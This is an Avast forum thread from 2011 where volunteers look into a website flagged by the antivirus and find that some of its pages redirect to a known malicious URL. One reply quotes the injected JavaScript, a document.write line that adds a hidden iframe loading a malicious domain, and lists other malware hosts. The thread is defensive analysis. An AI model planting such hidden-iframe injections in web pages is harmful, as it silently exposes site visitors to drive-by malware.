Author Topic: url false postive  (Read 6446 times)

0 Members and 1 Guest are viewing this topic.

isfere

  • Guest
url false postive
« on: August 11, 2011, 12:09:24 AM »

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76029
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: url false postive
« Reply #1 on: August 11, 2011, 08:07:37 AM »
You can report a possible FP here: http://www.avast.com/contact-form.php?loadStyles

Report    2011-08-11 01:48:00 (GMT 1)
Website    lineamedicahospitalaria.es
Domain Hash    6d9aa04ce3e59c5547e1d0a8f0f31aa7
IP Address    216.245.208.130 [SCAN]
IP Hostname    wnhsolar2.winnethost.us
IP Country    US (United States)
AS Number    46475
AS Name    LIMESTONENETWORKS - Limestone Networks, Inc.
Detections    0 / 23 (0 %)
Status    CLEAN

Report    2011-08-11 08:23:09 (GMT 1)
IP Address    216.245.208.130
IP Hostname    wnhsolar2.winnethost.us
IP Country    US
AS Number    N/A
AS Name    N/A
Detections    0 / 26 (0 %)
Status    CLEAN
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33976
  • malware fighter
Re: url false postive
« Reply #2 on: August 11, 2011, 03:56:23 PM »
See a report here: http://urlquery.net/report.php?id=1565
See the report here: http://wepawet.cs.ucsb.edu/view.php?hash=894c71ec08d2b2c85572231b9846182d&t=1313069947&type=js

No zeroiframes detected!
Check took 5.28 seconds

(Level: 0) Url checked:
-http://www.lineamedicahospitalaria.es/
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//webresource.axd?d=6qe_vmeilcewdagf7eyu0ghk92qf5wf3psuhwpr39i-ymqm7mpodwmxd9u27cfvv8xjftiugpdq9lhm1ijtbc2cfozc1&t=634445528553043750
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//scriptresource.axd?d=zhnl9vw3rnapmh0jaduul7yfxlk_57vxxubtbtxk7ylonuialy5v_xu6zxvv8nr38zgni_8oocs-jtvwzxdh9ntqqifs0vpy9a2kcxypdoa4yj7n0qqrs1ypdiml5miikw_fya2&t=ffffffffce71825b
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//scriptresource.axd?d=aiuzvw7wolarf3qdjgfwvy833ahsi6-fmlg-bei8srst3epmrih_iz66rz8r6flpn_gvs2iabkjjrm08-ukfpmxk4jyce5zxtzrlzqrprhhobhdbq6807xqenzjzighs9ile1fvx58jhc8xrjm4tgdouhti1&t=ffffffffd6ab16ef
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//scriptresource.axd?d=96d7y8rf2hp8taae1kn84jprsj3li1bonvux_kvjcqzqw-xwuap0pjg5nvt5mwgcvzn8bzhfmpwkisomvk8g_m8-kfn2ymyiystrjgukydanufmicru9xnjcxqboqqxzcl-dxw6rbkkldtckgmzelbgc0cvlgb39dj0z9kt3jzve4nan0&t=ffffffffd6ab16ef
Blank page / could not connect
No ad codes identified

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Sirmer

  • Avast team
  • Sr. Member
  • *
  • Posts: 324
Re: url false postive
« Reply #3 on: August 11, 2011, 05:20:47 PM »

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33976
  • malware fighter
Re: url false postive
« Reply #4 on: August 11, 2011, 05:41:00 PM »
Yes, malware found in the url:
-http://jhgukn.com/ur.php
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjs3023
document.write("<iframe src='-http://frsskillnet.cu.cc/showthread.php?t=98761267' style='display:none;'></iframe>") blocked by the avast Network Shield as URL:Mal
but I get a 404. Page not found for the site you mention. But it definitely was infected on 2011-08-10, see: http://www.google.com/safebrowsing/diagnostic?site=jhgukn.com/ur.php
lot of malicious url's and badware and current events here reported, see:
http://sitevet.com/db/asn/AS43134 & http://www.google.com/safebrowsing/diagnostic?site=AS:43134

polonus
« Last Edit: August 11, 2011, 05:48:08 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

iroc9555

  • Guest
Re: url false postive
« Reply #5 on: August 11, 2011, 06:24:49 PM »
Hi guys.

I help in the Non-English forum, and I asked the OP to post the URL here because my Avast6.0.1203 did not detected anything and Virus Total came out clean when I scanned the URL yesterday, wierd that now it is detected.

He is running Avast 4 and he said that he could enter in the URL with the work PC but not at his home (both machines run Avast)(work PC runs McAfee).

He posted a screenshot of the warning:

 http://forum.avast.com/index.php?topic=82882.msg676826#msg676826

I adviced him to check his PC for infection since he has a temp file that is making some kind of redirect to jhgukn.com/ur.php and that is what Avast is detecting. What else can I tell him ?

Thanks.

Added: When he tries to go to:

hXXp://www.lineamedicahospitalaria.es/clasificaciones.aspx?IdC=C3&Id=18

He gets redirected to  jhgukn.com/ur.php and that is infected

« Last Edit: August 12, 2011, 03:10:28 AM by iroc9555 »

isfere

  • Guest
Re: url false postive
« Reply #6 on: August 11, 2011, 09:24:14 PM »
thkns iroc9555

Thanks for making the explanation for my


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33976
  • malware fighter
Re: url false postive
« Reply #7 on: August 11, 2011, 09:45:39 PM »
Hi iroc9555,

Thanks for explaining the redirect to the initial poster. Good we all are protected by the avast shields,

polonus

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

isfere

  • Guest
Re: url false postive
« Reply #8 on: August 11, 2011, 09:53:55 PM »


Uploaded with ImageShack.us


malware antybytes free,

and my avast 4.8 my web shield is 4.8.

http://www.lineamedicahospitalaria.es  is good, but when yo want go to other section

example "antisepticos"
thanks fot everybody by their time.
« Last Edit: August 11, 2011, 09:59:12 PM by isfere »

YoKenny

  • Guest
Re: url false postive
« Reply #9 on: August 12, 2011, 02:10:32 PM »
malware antybytes free,

and my avast 4.8 my web shield is 4.8.
It seems you are running Malwarebytes Pro from your image ???

Why are you not running avast 6.0.1203  ???

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: url false postive
« Reply #10 on: August 12, 2011, 07:10:46 PM »
Please, upload (attach) the avast log:
C:\ProgramData\AVAST Software\Avast\log\Setup.log
or C:\Program Files\Alwil Software\Avast5\Setup\setup.log

If the file is too big for the forum, post the last 400-500 lines of it.
The best things in life are free.

isfere

  • Guest
Re: url false postive
« Reply #11 on: August 14, 2011, 07:52:41 AM »
http://xxx.megaupload.com/?d=O8IECRBB

in this link i have just upload, that log.

thkns.